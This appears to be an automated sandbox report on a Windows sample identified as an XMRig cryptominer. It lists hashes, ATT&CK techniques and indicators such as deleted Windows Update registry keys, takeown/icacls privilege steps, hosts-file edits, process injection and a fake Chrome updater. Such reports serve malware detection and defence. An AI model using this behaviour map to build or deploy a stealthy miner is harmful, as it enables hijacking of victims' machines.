xmrig | 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2022 19:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Size

2.6MB
MD5

c0827a7bd617a2fcd31a3d751152c2e0
SHA1

2d58f48e54e1c54e7b63e7ba2c9f50323994242a
SHA256

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b
SHA512

cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5
SSDEEP

49152:Y00kMwfXeTG2JpMpukZ6obih7GQtMKc+l3s7RjE+SsZa:YJkduTG2JQdZ6nhYK1cu3

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 4188 created 3280 4188 WerFault.exe DllHost.exe
PID 328 created 3388 328 WerFault.exe DllHost.exe

description	pid	process	target process
PID 4188 created 3280	4188	WerFault.exe	DllHost.exe
PID 328 created 3388	328	WerFault.exe	DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 3856 created 600	3856	powershell.EXE	winlogon.exe
PID 524 created 3388	524	svchost.exe	DllHost.exe
PID 524 created 3280	524	svchost.exe	DllHost.exe
PID 1708 created 600	1708	powershell.EXE	winlogon.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4932-505-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/4900-516-0x000000014036EAC4-mapping.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

4672 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1236 takeown.exe
1064 icacls.exe
3672 takeown.exe
4920 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4672	updater.exe

pid	process
1236	takeown.exe
1064	icacls.exe
3672	takeown.exe
4920	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1236 takeown.exe
1064 icacls.exe
3672 takeown.exe
4920 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ip-api.com

pid	process
1236	takeown.exe
1064	icacls.exe
3672	takeown.exe
4920	icacls.exe

flow	ioc
5	ip-api.com

Drops file in System32 directory 18 IoCs

Processes:

svchost.exepowershell.EXEpowershell.EXEsvchost.exeOfficeClickToRun.exeupdater.exepowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log	updater.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.EXEpowershell.EXEupdater.exe

description	pid	process	target process
PID 4948 set thread context of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 3856 set thread context of 2500	3856	powershell.EXE	dllhost.exe
PID 1708 set thread context of 2320	1708	powershell.EXE	dllhost.exe
PID 4672 set thread context of 4932	4672	updater.exe	dialer.exe
PID 4672 set thread context of 4900	4672	updater.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

powershell.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4732 sc.exe
5024 sc.exe
3488 sc.exe
3692 sc.exe
3948 sc.exe
5032 sc.exe
3012 sc.exe
4872 sc.exe
3716 sc.exe
2356 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2076 3388 WerFault.exe DllHost.exe
4340 3280 WerFault.exe DllHost.exe

pid	process
4732	sc.exe
5024	sc.exe
3488	sc.exe
3692	sc.exe
3948	sc.exe
5032	sc.exe
3012	sc.exe
4872	sc.exe
3716	sc.exe
2356	sc.exe

pid	pid_target	process	target process
2076	3388	WerFault.exe	DllHost.exe
4340	3280	WerFault.exe	DllHost.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEupdater.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1108	reg.exe
1772	reg.exe
1156	reg.exe
1516	reg.exe
328	reg.exe
4820	reg.exe
2836	reg.exe
4632	reg.exe
5056	reg.exe
1848	reg.exe
4160	reg.exe
4880	reg.exe
5004	reg.exe
2780	reg.exe
3400	reg.exe
2100	reg.exe
2156	reg.exe
2100	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exeWerFault.exesvchost.exe

pid	process
2020	powershell.exe
2020	powershell.exe
4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
4192	powershell.exe
3856	powershell.EXE
3856	powershell.EXE
4192	powershell.exe
3856	powershell.EXE
2500	dllhost.exe
2500	dllhost.exe
1708	powershell.EXE
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2076	WerFault.exe
2076	WerFault.exe
4340	WerFault.exe
4340	WerFault.exe
2500	dllhost.exe
2500	dllhost.exe
1708	powershell.EXE
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
524	svchost.exe
524	svchost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
524	svchost.exe
524	svchost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2520 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
2520	Explorer.EXE

pid	process
644

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Token: SeShutdownPrivilege	4380	powercfg.exe
Token: SeCreatePagefilePrivilege	4380	powercfg.exe
Token: SeShutdownPrivilege	3728	powercfg.exe
Token: SeCreatePagefilePrivilege	3728	powercfg.exe
Token: SeShutdownPrivilege	2112	powercfg.exe
Token: SeCreatePagefilePrivilege	2112	powercfg.exe
Token: SeShutdownPrivilege	4492	powercfg.exe
Token: SeCreatePagefilePrivilege	4492	powercfg.exe
Token: SeTakeOwnershipPrivilege	1236	takeown.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	3856	powershell.EXE
Token: SeDebugPrivilege	3856	powershell.EXE
Token: SeIncreaseQuotaPrivilege	4192	powershell.exe
Token: SeSecurityPrivilege	4192	powershell.exe
Token: SeTakeOwnershipPrivilege	4192	powershell.exe
Token: SeLoadDriverPrivilege	4192	powershell.exe
Token: SeSystemProfilePrivilege	4192	powershell.exe
Token: SeSystemtimePrivilege	4192	powershell.exe
Token: SeProfSingleProcessPrivilege	4192	powershell.exe
Token: SeIncBasePriorityPrivilege	4192	powershell.exe
Token: SeCreatePagefilePrivilege	4192	powershell.exe
Token: SeBackupPrivilege	4192	powershell.exe
Token: SeRestorePrivilege	4192	powershell.exe
Token: SeShutdownPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeSystemEnvironmentPrivilege	4192	powershell.exe
Token: SeRemoteShutdownPrivilege	4192	powershell.exe
Token: SeUndockPrivilege	4192	powershell.exe
Token: SeManageVolumePrivilege	4192	powershell.exe
Token: 33	4192	powershell.exe
Token: 34	4192	powershell.exe
Token: 35	4192	powershell.exe
Token: 36	4192	powershell.exe
Token: SeDebugPrivilege	2500	dllhost.exe
Token: SeIncreaseQuotaPrivilege	4192	powershell.exe
Token: SeSecurityPrivilege	4192	powershell.exe
Token: SeTakeOwnershipPrivilege	4192	powershell.exe
Token: SeLoadDriverPrivilege	4192	powershell.exe
Token: SeSystemProfilePrivilege	4192	powershell.exe
Token: SeSystemtimePrivilege	4192	powershell.exe
Token: SeProfSingleProcessPrivilege	4192	powershell.exe
Token: SeIncBasePriorityPrivilege	4192	powershell.exe
Token: SeCreatePagefilePrivilege	4192	powershell.exe
Token: SeBackupPrivilege	4192	powershell.exe
Token: SeRestorePrivilege	4192	powershell.exe
Token: SeShutdownPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeSystemEnvironmentPrivilege	4192	powershell.exe
Token: SeRemoteShutdownPrivilege	4192	powershell.exe
Token: SeUndockPrivilege	4192	powershell.exe
Token: SeManageVolumePrivilege	4192	powershell.exe
Token: 33	4192	powershell.exe
Token: 34	4192	powershell.exe
Token: 35	4192	powershell.exe
Token: 36	4192	powershell.exe
Token: SeIncreaseQuotaPrivilege	4192	powershell.exe
Token: SeSecurityPrivilege	4192	powershell.exe
Token: SeTakeOwnershipPrivilege	4192	powershell.exe
Token: SeLoadDriverPrivilege	4192	powershell.exe
Token: SeSystemProfilePrivilege	4192	powershell.exe
Token: SeSystemtimePrivilege	4192	powershell.exe
Token: SeProfSingleProcessPrivilege	4192	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid process

2632 Conhost.exe
4168 Conhost.exe
2832 Conhost.exe
4660 Conhost.exe
3924 Conhost.exe

pid	process
2632	Conhost.exe
4168	Conhost.exe
2832	Conhost.exe
4660	Conhost.exe
3924	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.execmd.execmd.exepowershell.EXE

description	pid	process	target process
PID 4948 wrote to memory of 2020	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 4948 wrote to memory of 2020	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 4948 wrote to memory of 212	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 4948 wrote to memory of 212	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 4948 wrote to memory of 4072	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 4948 wrote to memory of 4072	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 212 wrote to memory of 3488	212	cmd.exe	sc.exe
PID 212 wrote to memory of 3488	212	cmd.exe	sc.exe
PID 212 wrote to memory of 3692	212	cmd.exe	sc.exe
PID 212 wrote to memory of 3692	212	cmd.exe	sc.exe
PID 212 wrote to memory of 4732	212	cmd.exe	sc.exe
PID 212 wrote to memory of 4732	212	cmd.exe	sc.exe
PID 4072 wrote to memory of 4380	4072	cmd.exe	powercfg.exe
PID 4072 wrote to memory of 4380	4072	cmd.exe	powercfg.exe
PID 212 wrote to memory of 3716	212	cmd.exe	sc.exe
PID 212 wrote to memory of 3716	212	cmd.exe	sc.exe
PID 212 wrote to memory of 5024	212	cmd.exe	sc.exe
PID 212 wrote to memory of 5024	212	cmd.exe	sc.exe
PID 4072 wrote to memory of 3728	4072	cmd.exe	powercfg.exe
PID 4072 wrote to memory of 3728	4072	cmd.exe	powercfg.exe
PID 212 wrote to memory of 2836	212	cmd.exe	reg.exe
PID 212 wrote to memory of 2836	212	cmd.exe	reg.exe
PID 4072 wrote to memory of 2112	4072	cmd.exe	powercfg.exe
PID 4072 wrote to memory of 2112	4072	cmd.exe	powercfg.exe
PID 212 wrote to memory of 2100	212	cmd.exe	reg.exe
PID 212 wrote to memory of 2100	212	cmd.exe	reg.exe
PID 4072 wrote to memory of 4492	4072	cmd.exe	powercfg.exe
PID 4072 wrote to memory of 4492	4072	cmd.exe	powercfg.exe
PID 212 wrote to memory of 328	212	cmd.exe	reg.exe
PID 212 wrote to memory of 328	212	cmd.exe	reg.exe
PID 212 wrote to memory of 4632	212	cmd.exe	reg.exe
PID 212 wrote to memory of 4632	212	cmd.exe	reg.exe
PID 212 wrote to memory of 5056	212	cmd.exe	reg.exe
PID 212 wrote to memory of 5056	212	cmd.exe	reg.exe
PID 212 wrote to memory of 1236	212	cmd.exe	takeown.exe
PID 212 wrote to memory of 1236	212	cmd.exe	takeown.exe
PID 212 wrote to memory of 1064	212	cmd.exe	icacls.exe
PID 212 wrote to memory of 1064	212	cmd.exe	icacls.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
